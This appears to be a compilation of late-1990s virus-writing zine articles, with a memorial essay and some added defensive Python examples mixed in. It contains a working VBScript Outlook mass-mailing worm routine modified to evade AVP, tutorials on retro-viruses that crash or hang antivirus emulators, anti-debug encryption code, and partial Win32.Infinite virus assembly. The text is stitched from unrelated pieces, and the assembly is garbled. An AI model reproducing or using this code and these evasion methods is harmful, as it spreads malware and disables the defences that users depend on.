Most viruses today have retro abilities, but I'm talking about a virus that is specially coded to destroy anti-virus programs. It would turn off resident AV monitors, install trojans in anti-viruses (*.AVC and TBSCAN.DEF infection). It would also overwrite part of the AV programs by installing itself in them and then simulate that the AV scans. There are several viruses that patched the "File system" status in TbScan's output to hide the fact that it suddenly used DOS services to read the disk. A SAAV virus would for example execute the graphics procedure to display the message "Scanning for known viruses in memory" of F-Prot/DOS but then just wait for some time. It would use the necessary procedure to bring up the scanning window, display file names and, instead of checking them, infect them. Or for example display "Checking partition table" of ThunderByte Partition (created by TbUtil) and check nothing. It could be like real AIDS, which doesn't kill; it just destroys the immune system and clears the way for other diseases. It doesn't take much code to do so, just some small patches. The problem is how the virus finds what to patch, because AV companies change the inner structure of the program with every new version. At this moment the fact that most AV programs don't let themselves be encrypted/compressed (because of the CRC check) comes in real handy.

Simulating viruses

Based on the above idea, these viruses would install themselves in some specific programs and then simulate. One example could be PGP (so that the signature is always GOOD, and goodbye to trustworthy software). It could also be one virus that patches several products.

"Expensive" viruses

It's actually an image of what happened here in Estonia: quite some Internet users received a file called Estonia.Exe. This was a SFX ZIP and contained a client program for some sex server. Anyway, after execution the program also did some other things, and as a result the PC began to connect to the Net through a Malaysian (if I remember correctly) server, which had quite high prices. Nobody knew it and everyone was REALLY surprised when at the end of the month the telephone bill was HUGE. There was talk that this was a virus, but most (including specialists) don't think so. It seems that it was just a trojan. But this idea can be used in viruses (a good way to compromise the lamest ISP near you).

Destroying the PC speaker

Last, a destructive payload from KUTT/TPT Gang. The idea is based on the fact that speakers may get damaged when the music is too loud. KUTT thought that it would be interesting if a virus did that to the PC speaker: generate a high and loud sound and play it for quite some time. It's probably technically impossible to realise, but who knows? An enhanced version of this idea is to damage the speakers that are connected to the sound card. This should actually be more realistic, because usually the hardware of a sound card is capable of that and the speakers aren't made for this situation.


The protector scene

Kalkin/EViL

There are many sub-cultures in the computer world: hackers, demo coders, musicians, graphicians, virus authors, crackers. And there's also a not so well known scene: the protector scene. It mostly consists of crackers. So what do these protector guys do? They research ways to defeat debuggers/code analysers/emulators/disassemblers and write programs that use these ways to protect COM and EXE files. Why am I telling you this? Because there's been quite some talk about anti-byte techniques, the advantages of slow polymorphism and other ways to make the detection and/or disinfection of a virus harder. But almost nothing has been said about anti-debug tricks, even though those are REALLY important. Already in number 4 (or was it number 6?) of 40hex there was an article about AD code. The samples there were for confusing the reading of code. But the methods have evolved FAR beyond that. Nowadays the protecting part uses stack tricks to crash debuggers, switches between protected and real mode, checks memory, calculates checksums, debugs and emulates itself, relocates the code in memory, opens the original file and checks it for changes. The protectors contain polymorphic engines (I've seen all the better-known MTEs in them: TPE, ViCE, MtE, DAME, etc.). They have become really powerful. But they still resemble viruses: get executed first, do their stuff, clean up, execute the real program. Some of these protectors are REALLY hard to crack; even really good crackers have a problem with them.

I come to the point now: what do you think, how many really good crackers are there among AVers? Sure, they know debuggers and disassemblers, but that's not enough to be a good cracker. What now if some hard AD code, so hard that even the best crackers have problems with it, has been used in your virus? Wouldn't the AVer who gets a sample of it have some sad times, sitting up all night and trying to decrypt the virii? But how can a virus writer get this kind of code? To our luck, exactly like in the viral business, there are many source codes available.

And there's also another reason to check out protectors: quite a lot of them check the executable for changes. It's no problem when your virus is resident and has stealth capabilities, but if you coded a runtime virii then you're fucked. This can be changed by adding code that prevents the virii from infecting protected files. Of course there's a third reason: use the encryption routines of a protector for crypting the virus. Or you can encrypt the file with this code and insert another decryptor, which decrypts your virii, into the main decryptor. The main goal is that AVP for example (seems to be the AV which can unpack the most executable compressors and decryptors) scans the file (finds no viral infection), finds the protector, unpacks it, scans the unprotected file (and finds again no virus). A (possibly) good example of the code produced by the protector scene are EliCZ's device drivers, ExDs. They are VxDs that are executed in DOS, work their way up to ring 0 and stay there. Plus points: undetectable (or that's at least what EliCZ claims). Why can't we use this technology in our virii? But check out the things yourself. You just need access to the Internet and the following address: http://www.suddendischarge.com

Katja Kladnik (Lucky Lady)

Richard Karsmakers

"Make haste slowly." Suetonius, "Lives of the Caesars"

ST NEWS VOLUME 10 ISSUE 2
DEDICATION ARTICLE
TO KATJA KLADNIK (R.I.P.)
by Richard Karsmakers

Some of you will maybe remember me mentioning a girl from Slovenia by the name of Lucky Lady that contacted me about 18 months ago for the first time. She has occurred in various installations of the ST NEWS virus column.

As you may recall, she had decided to contact me in a reaction to my "Ultimate Virus Killer", which had in some way caused her to start a kind of 'competition' with her designing and spreading computer viruses and me trying to find and kill them. She sent me each of her creations so that I could update the "Ultimate Virus Killer" recognition algorithms. Although I certainly didn't approve of all these things she did nor the way she involved me in it, all I could do was play along with the game. I couldn't contact her in return, because she always sent her packages anonymously.

As 1994 was coming to its close, it became apparent that she had left the Atari community and was now concentrating more on the PC side of things. Also, quite suddenly she contacted me via electronic mail. Though I still didn't know her name, I could now at least send messages back to her. Especially with her having left the Atari virus creation scene, something happened which I had not considered possible: our email messages became more casual and even personal.

Gradually I found out that her real name was Katja Kladnik, who had lost her parents in the Yugoslavian war, though Slovenia was now no longer a war zone. She now lived with foster parents and studied psychology at the University of Ljubljana, the capital of Slovenia. She was - I know this may sound strange to some of you, especially those struck by any of the viruses she has created - a really fascinating person who had a lot of hidden depths to her personality. We exchanged email messages with quite some regularity, usually involving topics like music, culture and, occasionally, viruses. I always wondered why she had found it so challenging to create computer viruses and start this semi-friendly "virus war" with me, a question that she could never really reply to satisfactorily.

Around spring of this year I noticed her messages getting increasingly gloomy and depressing. She even said, on several occasions, that she wouldn't mind being dead or something. I never knew what triggered this doom and gloom, though it might have been her boyfriend leaving her some time earlier. There was nothing I could do about it, either. Believe me, I tried.

When I emailed her to ask how she was doing, somewhere around the middle of June, I got a message back after a while from someone else who said that, on June 3rd, 11:53 CET, Katja had died at Ljubljana's main hospital of an Atropine and Scopolamine overdose. Suicide, most likely. She was 22.

Despite the fact that, in theory, Katja "Lucky Lady" Kladnik had started off as something like an enemy, in the course of our correspondence she had become a kind of friend. Especially after she had left the Atari scene, we opened up to each other and I no longer felt that being in contact with her was in some way morally incorrect, what with my being a virus killer programmer and her a (by then ex-) Atari virus coder. During the last one or two months she was to me not a virus coder at all, but instead a sad young woman that needed attention and love badly.

Katja, despite the fact that we started off on a really wrong foot, you will be on my mind always; not as a virus coder but as the enchanting and fascinating friend that you gradually became.

This issue of ST NEWS is dedicated to the memory of Katja Kladnik.

Anti Avp Vbs I-Worms Detection. By [K]Alamar

In one of the last updates, the AVP antivirus has added a detection for I-Worms that use the Outlook replication method, used in almost all the VBS and JS worms, like I Love You,

Bubbleboy and all of them. Ok, this will make your I-worm undetectable for AVP till they add it to the database; I'm pretty sure that if in your worm you use Outlook replication you use this code, or one similar:

---
Dim fso, ws
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp = "Outlook" then
  Set Mapi = OApp.GetNameSpace("MAPI")
  For Each AddList In Mapi.AddressLists
    If AddList.AddressEntries.Count <> 0 Then
      For AddListCount = 1 To AddList.AddressEntries.Count *
        Set AddListEntry = AddList.AddressEntries(AddListCount)
        Set msg = OApp.CreateItem(0)
        msg.To = AddListEntry.Address
        msg.Subject = "Your subject"
        msg.Body = "The body"
        msg.Attachments.Add "path to your Worm"
        msg.DeleteAfterSubmit = True
        If msg.To <> "" Then
          msg.Send
        End If
      Next
    End If
  Next
end if
---

The only thing that you should do is add one line and change another, like here (lines with * are the modified ones):

---
Dim fso, ws
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp = "Outlook" then
  Set Mapi = OApp.GetNameSpace("MAPI")
  For Each AddList In Mapi.AddressLists
    If AddList.AddressEntries.Count <> 0 Then
      AddlistCount = AddList.AddressEntries.Count *
      For AddListCount = 1 To AddlistCount *
        Set AddListEntry = AddList.AddressEntries(AddListCount)
        Set msg = OApp.CreateItem(0)
        msg.To = AddListEntry.Address
        msg.Subject = "Your subject"
        msg.Body = "The body"
        msg.Attachments.Add "path to your Worm"
        msg.DeleteAfterSubmit = True
        If msg.To <> "" Then
          msg.Send
        End If
      Next
    End If
  Next
end if
---

You should delete the "*" if you want the worm to work. I think that if you know something about I-Worms you should understand what I did; I just create a new variable, AddlistCount, set it to the number of address entries, and then use that new variable in the next line.

I hope you understood this.

[K]Alamar - [email protected]
Virii Argentina
http://www.virii.com.ar
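What the change above slips past is a signature pinned to one literal source line. The following is an added example, not part of [K]Alamar's article or AVP's detection logic, showing from the scanner's side why that kind of signature is brittle and what survives the rewrite: normalize the script text and look for the set of Outlook automation calls a mass-mailing script cannot do without, whatever its loop bound is called. The two script fragments are constructed, shortened stand-ins for the article's two listings (not complete scripts), the benign fragment is constructed too, and the indicator list and function names are choices made for this example.

```python
"""Behaviour-based detection for Outlook/MAPI mass-mailing VBScript.

Added example, not the article's code.  A signature on one literal line
breaks as soon as the line is re-spelled; matching the automation calls
the behaviour needs does not.  All script fragments are constructed.
"""
import re

# Constructed fragment in the shape of the article's first listing.
VARIANT_ORIGINAL = '''
Set OApp = CreateObject("Outlook.Application")
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
  For AddListCount = 1 To AddList.AddressEntries.Count
    msg.Attachments.Add "path to your Worm"
    msg.Send
  Next
Next
'''

# Constructed fragment in the shape of the article's modified listing.
VARIANT_REWRITTEN = '''
Set OApp = CreateObject("Outlook.Application")   ' comment: same behaviour
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
  AddlistCount = AddList.AddressEntries.Count
  For AddListCount = 1 To AddlistCount
    msg.Attachments.Add "path to your Worm"
    msg.Send
  Next
Next
'''

# Constructed benign automation script: talks to Outlook but sends nothing.
BENIGN = '''
Set OApp = CreateObject("Outlook.Application")
Set Mapi = OApp.GetNameSpace("MAPI")
WScript.Echo Mapi.GetDefaultFolder(6).Items.Count   ' 6 = olFolderInbox
'''

# The kind of literal signature the article's one-line change is aimed at.
NAIVE_SIGNATURE = "for addlistcount = 1 to addlist.addressentries.count"

# Automation calls a VBS mass mailer needs, independent of variable names.
BEHAVIOURS = {
    "outlook_app":   r'createobject\(\s*"outlook\.application"\s*\)',
    "mapi_session":  r'\.getnamespace\(\s*"mapi"\s*\)',
    "address_books": r'\.addresslists\b',
    "address_walk":  r'\.addressentries\b',
    "attachment":    r'\.attachments\.add\b',
    "send":          r'\.send\b',
}


def normalize(script: str) -> str:
    """Lower-case the script, drop VBScript comments (an apostrophe outside a
    string literal starts one) and collapse whitespace, so spelling changes
    that do not alter behaviour disappear before matching."""
    lines = []
    for line in script.splitlines():
        in_string, kept = False, []
        for ch in line:
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                break  # rest of the line is a comment
            kept.append(ch)
        lines.append(" ".join("".join(kept).split()))
    return "\n".join(ln for ln in lines if ln).lower()


def naive_signature_hits(script: str) -> bool:
    """Literal-line signature: defeated by renaming the loop bound."""
    return NAIVE_SIGNATURE in normalize(script)


def behaviours_found(script: str) -> dict:
    """Which of the mass-mailing behaviours the normalized script shows."""
    text = normalize(script)
    return {name: re.search(pat, text) is not None for name, pat in BEHAVIOURS.items()}


def is_mass_mailer(script: str) -> bool:
    """Flag only when every behaviour is present, so read-only Outlook
    automation is not reported."""
    return all(behaviours_found(script).values())


if __name__ == "__main__":
    for name, sample in [("original", VARIANT_ORIGINAL),
                         ("rewritten", VARIANT_REWRITTEN), ("benign", BENIGN)]:
        print(name, "naive:", naive_signature_hits(sample),
              "behavioural:", is_mass_mailer(sample))
```

The behavioural rule is still only a heuristic: a script that builds the call names from string fragments at run time would need emulation or script-engine hooks to classify, which is exactly the direction scanners took after this generation of worms.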

--==< Retro the easy way. >==--

By MidNyte, February 2000

What is a Retro-virus?
-------------------------

A Retro-virus is any virus that attacks antivirus programs, whether generically or just specific programs. It is generally used to disable or fool one or more of the popular antivirus programs. For instance, a certain virus will detect if a certain on-access scanner is in memory, and will issue the correct call to shut it down if it is. Another will patch the resident part of the scanner that decides whether to scan a file or not and make it decide not to in all cases. These are very useful functions, but if you're not of the ability to work out these methods for yourself, you are left with the choice of: leaving retro-functions out of your virus, using other people's routines (which are therefore not new) or trying something different. That is what this tutorial is about, a few simple ideas that will give basic retro-functionality without the need to be too far advanced in coding. All you need is some basic anti-emulation skills.

What's the theory?
---------------------

So how do we get Retro without learning it all? Basically we find ways to annoy the user so much that he does the job of disabling the antivirus program for us. If we slow him down when he scans he will probably eventually only scan overnight, giving us a day to spread. If we make the program crash he probably won't bother scanning it again, he'll just add it to the ignore list. (It's not that uncommon to find a file that can't be scanned without crashing on a Microsoft machine :)

How do we implement it?
--------------------------

You remember reading that a good emulator will save its place when it finds a decision-based jump? That way, if the code does a check of something and then quits if the condition is met, the emulator can just go back and pretend the condition wasn't met and see what it can find down the other branch of the program. This is to defeat the technique of quitting when finding an emulator. How about we stop that? How about we do our anti-emulation bit and then test it, but if we're being emulated, instead of just quitting, we crash the program? Or better still, if we're on a Pentium, why not just hang the machine? It's what the 'foof' bug is there for :) If the machine hangs, the antivirus program has no chance to return to the jump and try the other branch and the user will probably not bother scanning it again. If he does, the same thing will happen again and again, the user will never get a complete scan. Here's a rough guide to the code needed, assuming that you have in place a suitable emulation-detection routine:

        cmp  ax, 028h                   ; our test for emulation
        je   not_emulated               ; jump if equal
        db   0F0h, 00Fh, 0C7h, 0C8h     ; this will hang most Pentium machines, it's
                                        ; known as the 'foof bug' for obvious reasons.

not_emulated:                           ; here we are safe from the AV program

How many end users are going to restart the computer and try scanning that file again when the last time it hung the computer? In the Microsoft age of idiot-friendly operating systems, not many. If they don't know what's going on and the machine hangs, they just won't do it again. If they do once, they won't twice. Take the virus hoax emails that constantly do the rounds: most people know better than to respond and forward the mail, but the fact that they carry on spreading shows just how many idiots there are out there who are capable (just about) of using a computer. These are the people who will not scan your file but simply add it to the ignore list, leaving it to go about its business.

Another method is the time-wasting method. Again it's down to annoying the user so much they don't bother scanning. If you can go round enough loops when you find emulation that the scanner takes minutes just to scan one file, the scanner will probably only be run overnight and taken off constant background monitoring. That gives you a day to spread, and spread unnoticed.

Contact
----------

Comments/questions/suggestions/bug reports/etc. are welcomed as always, as long as it is kept reasonable. - MidNyte

As always, I welcome ANY feedback, good or bad, as long as it is reasonable.

| [email protected] | www.coderz.org/midnyte | www.shadowvx.com/midnyte |

--==< How to become the world's richest man >==--

By MidNyte, June 1999 (Approx).

Microsoft are rumoured to have stated that they will use unlimited resources and funds to find the author of the VBS/Monopoly worm. The worm carries a message accusing Bill Gates of monopoly and includes a satirical picture of Bill Gates' head on the Waddingtons character featured on a Monopoly board. This particular worm is much less of a security risk to the user than other viruses. Surely everyone can see this is a case of bruised millionaire's ego? Why does no-one point out to Bill that the worm spreads through the almost unbelievable lack of security that Microsoft products offer? Why not, Mr. Gates, use unlimited funds and resources to FIX your defective products? Why not, Trading Standards, make him make his product do what it claims to do, and while you're at it, make him either make it secure, or make him warn people of the security risk? This is the world's richest man, who owns one of the world's biggest companies, and that is how he got rich, by writing a half-product and managing to sell it for a huge price. Money that should have gone into making the products what they claimed to be went into Bill's back pocket instead. We now have proof in this retaliation to a simple worm that to Bill Gates, his ego is worth billions, his customers are not. The virus didn't prove your guilt Bill, it didn't need to. Your reaction leaves us in no doubt.

--==< An Introduction to Encryption, Part III >==--

Is an impenetrable encryption possible?

By MidNyte, February 2000

A short (and over-simplified) history of the virus
-----------------------------------------------------

First of all came the un-encrypted virus. Then came virus scanners, which were basically just hex searchers looking for strings of hex only found in certain viruses. Viruses retaliated by coming up with encryption. Most of the virus is encrypted, and a small decryption engine at the start of the virus decrypts the virus body. As the encryption changes each time, the virus scanner is limited to searching for a much smaller section of code inside the constant decryptor. This wasn't much of a problem for virus scanners though. Viruses fought back again with polymorphism; this is essentially a way that a virus can change its decryptor every time it infects a new file. That way no constant strings appear in the virus. Virus scanners came up with two ways to combat this, heuristics and emulation. Heuristics is simply looking for code that looks 'virus-like'. This can be something as simple as the string '*.exe'. Emulation is the controlled running of the program instruction by instruction (not quite, but close enough for this article). A virus, under emulation, will be allowed to run just enough to decrypt itself and reveal its code for either a straightforward scan or a generic (heuristic) scan. Anti-emulation is the virus's way of defeating this; it is basically a way to detect emulation in progress and act accordingly. Some anti-emulation systems are incorporated into the decryptor of a virus, so that if the virus is being emulated it will not decrypt properly and hence not reveal its code. Another defence the virus can use is anti-debugging, which is designed to hinder people who try to debug (in this case unencrypt) your code. This is different in that it doesn't defend the virus from antivirus programs, it defends it from the antivirus companies, the people who will try and study the virus and work out a way to detect it. Anti-debugging can be very simple, like turning off the keyboard interrupts at the start of the code and back on again at the end, or it can be quite complicated, with the actual anti-debugging routine also being used as a key to decryption to protect against patching. This is the focus of this article.

Anti-debugging: more detail
------------------------------

Anti-debugging tricks are basically little pieces of code that have no overall effect on the running of a virus when being run as normal, but that cause the virus to malfunction, crash or worse when they are run under a debugging environment. The simple example above was to turn off the keyboard interrupt at the start of the code, and turn it on again at the end of the virus before control is passed back to the host program. This is simply achieved with:

        in   al, 020h        ; \
        or   al, 002h        ;  } Disable keyboard interrupt
        out  020h, al        ; /

...at the start, and:

        in   al, 020h        ; \
        and  al, 0FDh        ;  } Enable keyboard interrupt (FDh = NOT 2)
        out  020h, al        ; /

...at the end. When the virus is run under normal conditions, the keyboard is only off for a very small time, too small for people to notice. If the program is running under a debugger, as soon as the first few instructions are run the keyboard will no longer work, leaving the person at the debugger with no choice but to reset (at least it used to be in the good old days :) The simple workaround for the person debugging was to simply patch over the code that turned off the keyboard with NOPs or other do-nothing instructions. Now the virus would work as normal under a debugger, without disabling the keyboard. To retaliate against this, the virus started to use its anti-debugging routine as a key for decryption. The hex string to turn off the keyboard is 'E4 20 0C 02 E6 20'. If this was one of the decryption keys, the person debugging could not just replace the instructions with NOPs, as this would change the key to '90 90 90 90 90 90' and cause the virus to decrypt incorrectly. This seems like an ideal solution, but unfortunately it is not. The whole point of this article is to point out the following fact: any decryption routine can have its basic functionality copied by someone determined to debug it. This means that your routine that uses an anti-debugging routine and also uses that routine as a key for further decryption could be useless. Let's go through it with an example. The original virus looks like this:

start:
        in   al, 020h                   ; \
        or   al, 002h                   ;  } Disable keyboard interrupt
        out  020h, al                   ; /

        xor  si, si                     ; si = index into the key (the code from start: to decrypt:)

        lea  bx, start_of_encrypted     ; bx = first word of the encrypted body
        lea  cx, end_of_encrypted
        sub  cx, bx
        shr  cx, 001h                   ; cx = number of words to decrypt

decrypt:
        mov  ax, word ptr [start+si]    ; fetch the next key word from the live code
        xor  word ptr [bx], ax          ; decrypt one word of the body
        add  bx, 2                      ; advance to the next word of the body
        add  si, 2                      ; advance to the next word of the key
        cmp  si, decrypt - start        ; used up the whole key?
        jne  next_key_word
        xor  si, si                     ; yes, start again from its first word

next_key_word:
        loop decrypt

The pointer to the relevant word of the decryption key is kept in si, and means that the key is all the code from 'start:' to 'decrypt:'. This works out as 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9'. If the keyboard part was NOPped out the key would change to '90 90 90 90 90 90 33 F6 BB 19 01 B9 36 01 2B CB D1 E9', as we've already seen. What the person doing the debugging could do though, is simply take the encrypted portion of the virus and put it into his own program, only this time the key would be stored as data, not as an executable part of the program, like this:

start:
        xor  si, si

        lea  bx, start_of_encrypted
        lea  cx, end_of_encrypted
        sub  cx, bx
        shr  cx, 001h

decrypt:
        mov  ax, word ptr [key+si]      ; key word now comes from the data below, not from live code
        xor  word ptr [bx], ax
        add  bx, 2
        add  si, 2
        cmp  si, key_end - key
        jne  next_key_word
        xor  si, si

next_key_word:
        loop decrypt
        jmp  start_of_encrypted         ; done: skip over the key data into the decrypted body

key:    db   0E4h, 020h, 00Ch, 002h, 0E6h, 020h    ; the bytes of the original anti-debug code...
        db   033h, 0F6h, 0BBh, 019h, 001h, 0B9h    ; ...and the rest of the original key, copied
        db   036h, 001h, 02Bh, 0CBh, 0D1h, 0E9h    ; from a hex dump and stored as plain data
key_end:

As you can see, the above will decrypt the encrypted section in exactly the same manner, only because the key is stored as data we can change the code as much as we like.
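The same analyst-side move in Python, as an added example that is not part of MidNyte's article: the key is carved out of a byte image the way it is read off a hex dump, held as data, and applied word by word exactly as the 'decrypt:' loop applies it, so no anti-debug instruction is ever executed. It assumes the 18 key bytes quoted above; the "encrypted body" is a constructed sample string, and the function names are choices made for this example.

```python
"""Analyst-side re-implementation of the article's XOR decryptor.

Added example, not the article's own code.  It reproduces what the
'decrypt:' loop does (XOR the body one 16-bit word at a time against the
key words taken from the bytes between 'start:' and 'decrypt:', restarting
the key when it runs out) with the key held as data.  The sample body is
constructed for the demo.
"""

# The 18 code bytes the article names as the key: 'start:' up to 'decrypt:'.
KEY_FROM_CODE = bytes.fromhex("E4200C02E62033F6BB1901B936012BCBD1E9")

# The same region after a debugger patched the port I/O with six NOPs (90h):
# the key a patched-in-place copy would compute, and therefore the wrong one.
KEY_AFTER_NOP_PATCH = bytes.fromhex("90909090909033F6BB1901B936012BCBD1E9")

# Constructed stand-in for the encrypted virus body (36 bytes, word aligned).
SAMPLE_BODY = b"constructed sample body for the demo"


def extract_key(image: bytes, start: int, decrypt: int) -> bytes:
    """Carve the key out of a raw byte image of the program the way an analyst
    reads it from a hex dump: every byte from 'start:' up to, but not
    including, 'decrypt:'."""
    if not 0 <= start < decrypt <= len(image):
        raise ValueError("offsets must satisfy 0 <= start < decrypt <= len(image)")
    return image[start:decrypt]


def xor_words(data: bytes, key: bytes) -> bytes:
    """XOR data against the key, 16-bit little-endian word by word, restarting
    the key from its first word once the last has been used.  XOR is its own
    inverse, so the same call encrypts and decrypts."""
    if not key or len(key) % 2 or len(data) % 2:
        raise ValueError("key and data must be non-empty and word aligned")
    key_words = [int.from_bytes(key[i:i + 2], "little") for i in range(0, len(key), 2)]
    out = bytearray()
    for n in range(0, len(data), 2):
        word = int.from_bytes(data[n:n + 2], "little")
        out += (word ^ key_words[(n // 2) % len(key_words)]).to_bytes(2, "little")
    return bytes(out)


def demo() -> dict:
    """Encrypt the constructed body with the code-derived key, then show that
    the data-key re-implementation recovers it while the key a NOP-patched
    copy would compute does not."""
    encrypted = xor_words(SAMPLE_BODY, KEY_FROM_CODE)
    # Fake image laid out as [key code][encrypted body], with the offsets an
    # analyst would have noted from the disassembly.
    image = KEY_FROM_CODE + encrypted
    key = extract_key(image, start=0, decrypt=len(KEY_FROM_CODE))
    return {
        "data_key_recovers_body": xor_words(encrypted, key) == SAMPLE_BODY,
        "nop_patched_key_recovers_body": xor_words(encrypted, KEY_AFTER_NOP_PATCH) == SAMPLE_BODY,
    }


if __name__ == "__main__":
    print(demo())
```

The point carried over from the article is that the decryptor's behaviour, not its instructions, is what matters: once the key bytes and the word-wise XOR schedule are known, a few lines of ordinary code reproduce the layer without running any of the virus.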

Is an impenetrable encryption possible?
------------------------------------------

So then, is it possible to include enough current techniques, or to come up with a new technique, to completely eliminate the chance of the antivirus programmers being able to decode it? Many people think that they have found a way to ensure that their program is completely impenetrable to decryption unless it is running at the time. This is, unfortunately, unachievable in theory. Because of the above demonstrated technique, any anti-debugging technique can be overcome by someone with enough time to debug a program by hand. This means that *any* anti-debug code you put into a virus can be got around eventually, because the person debugging can always read what is going on in a hex editor and make a new routine to simulate it, hence the routine you write will not always be used to decrypt the code. They will only see one layer of decryption at a time, however, and this is the key to making an impenetrable encryption.

Conclusion
-------------

In the end then, we can never make it *impossible* for a researcher to decrypt a virus through programming tricks; however, we can make it *impractical* through the use of scale, i.e., we can use so many layers and different tricks that it is impractical to debug. If it takes a week for a programmer to decrypt a virus with hundreds of layers of encryption, they may be able to justify it. If they have ten viruses of this kind it gets harder to justify, and with a hundred of them it starts to get impractical. The ball would be back in their court.

Contact
----------

Comments/questions/suggestions/bug reports/etc. are welcomed as always, as long as it is kept reasonable. - MidNyte

As always, I welcome ANY feedback, good or bad, as long as it is reasonable.

| [email protected] | www.coderz.org/midnyte | www.shadowvx.com/midnyte |

;
;ÄÄÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄ¿
; ÚÄÜÜÜÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÙ        [ Win32.Infinite   Billy Belcebu/iKX ]
; ÀÄÛÛÛÄÛÛÛÛÛÛÄÄÄÛÛÛÛÛÄÄ¿ ÚÄÄÄÄÄÄ[ 1699 bytes   Target - Win32 Ring3 ]ÄÄÄÄÄÄ
; ÚÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÙ ³      [ 17/07/00 - Made in Valencia, Spain ]
; ÀÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÄÄÙ
;
;
;
; [ Introduction ]
;
; Welcome to Infinite. This virus has been very rare for me, as its ambient
; of development was very odd. Well, it's my first virus using cavity tech,
; something that i thought that it was more difficult than it really was...
; I sincerely doubt that it would work in WinNT family (NT4,W2K), as i haven't
; been able to test it there (Win2k has some incompatibilities with my
; 3DFX Voodoo2 and my soundcard), but i didn't want to change that thing of
; Win32. If it doesn't, i don't care... Blah blah blah, i've returned from my
; laaaarge VX holidays and i've just recently finished Forever and this babe.
; I hope i haven't lost my awesome code style (blah, just kidding... i don't
; have anything awesome besides the size of my dick - enormous) :)
; Oh, i almost forgot... I've realized that the cavity technique is stable
; most of the times, but it's not perfect, and i should do much more compro-
; bations before infection than the already existing ones, but i really don't
; care: Windows also has fails in its code and noone reminds it ;)
; It's not a special virus in any field, but i wanted to do some cavity stuff
; and here it is. Mwaha!
;
; [ Features ]
;
;  + Cavity virus, searches for holes of zeroes or INT 3.
;  + Infect files on current, WINDOWS and WINDOWS/SYSTEM directories.
;  + Simple & silly 8-byte XOR encryption loop
;  + Kinda simple EPO with emulator protection
;  + Checks for SFC protection (if it works in Win2k...)
;  + CRC32 usage (APIs, extensions...)
;  + It's intended to be optimized (not too much, but enough)
;
; [ Greetings ]
;
; This time the greets will go to few ppl. From the VX scene, to StarZer0,
; Wintermute, VirusBuster, Benny, Asmodeus, LifeWire, Bumblebee, Ypsilon,
; and from outside to my best friends out there. Also to the people that try
; to make this place we call world a much better place. You rule, guyz.
;
; [ Infinity - The song ]
;
; Mother watch your children
; The iron fist of fear is ruling our lives
; It's not too late to change the course
; We can make this world a better place to be in
;
; How much more do we want until we're satisfied?
; What happens when we have what we want?
; Acquiring more, still there's never enough
; We forget those who really are in need
; The end is near, or so they say
; Selling peace with guns
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?

;
; Guns spitting (out the) message of peace everywhere
; Is it really that we don't care?
; See mercenaries of fear selling love
; Telling salvation comes from above
; Arrogance and fear walking hand in hand
; We must see that there's much more to life than this
;
; Mother see your children
; Make us understand to and help us to find the way
; The answers lie inside
; They are locked inside to the vault of truth of us
; It's time to spread the word around
; Be yourself and do what you want to do with your life
; Remember, you get just what you give
; You reap all what you sow
; You are in charge of your own life
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
; You make your own way
;
; ------------------------------------------
; Infinity - [ Stratovarius ] - ( Infinite )
;
; (c) 2000 Billy Belcebu/iKX [ http://beautifulpeople.cjb.net ]

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Win32.Infinite (c ) 2000 Billy Belcebu/iKX º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

include host.inc ; Some nice includesinclude infinite.inc

virseg segment dword use32 public 'infinite'

virus_start :

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Virus code º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

infinite :push eax ; Make some space on stackpushadcall decrypt

encrypt_start = $call get_delta

call SetSEH ; Set our new protection framemov esp ,[ esp +08h ]call get_deltajmp RestoreSEH

SetSEH:xor edx , edxpush dword ptr fs :[ edx ]mov dword ptr fs :[ edx ], esp

push 05h ; ECX is the limit of pages

pop ecxmov esi , ebp ; We put a page inside our codecall CheckImageBase ; Get our own image basemov dword ptr [ ebp+modbase- delta ], esi

push 05h ; 50 pages to scanpop ecxmov esi ,[ esp +2Ch] ; Put the candidate to kernelcall CheckImageBase ; Scan backwards for itmov dword ptr [ ebp+kernel - delta ], esi

lea eax ,[ ebp+api_list - delta ] ; Let's detect all the neededxchg eax , esi ; APIs :)lea edi ,[ ebp+api_addresses - delta ]call GetAPIs

; Virus is now initialized, let's search for object ives.

lea edi ,[ ebp+current_dir - delta ] ; Save current directory topush edi ; a temp variablepush 7Fhapicall GetCurrentDirectoryA

lea edi ,[ ebp+infect_dir - delta ]push 7Fhpush ediapicall GetWindowsDirectoryAcall SetDir &Infect

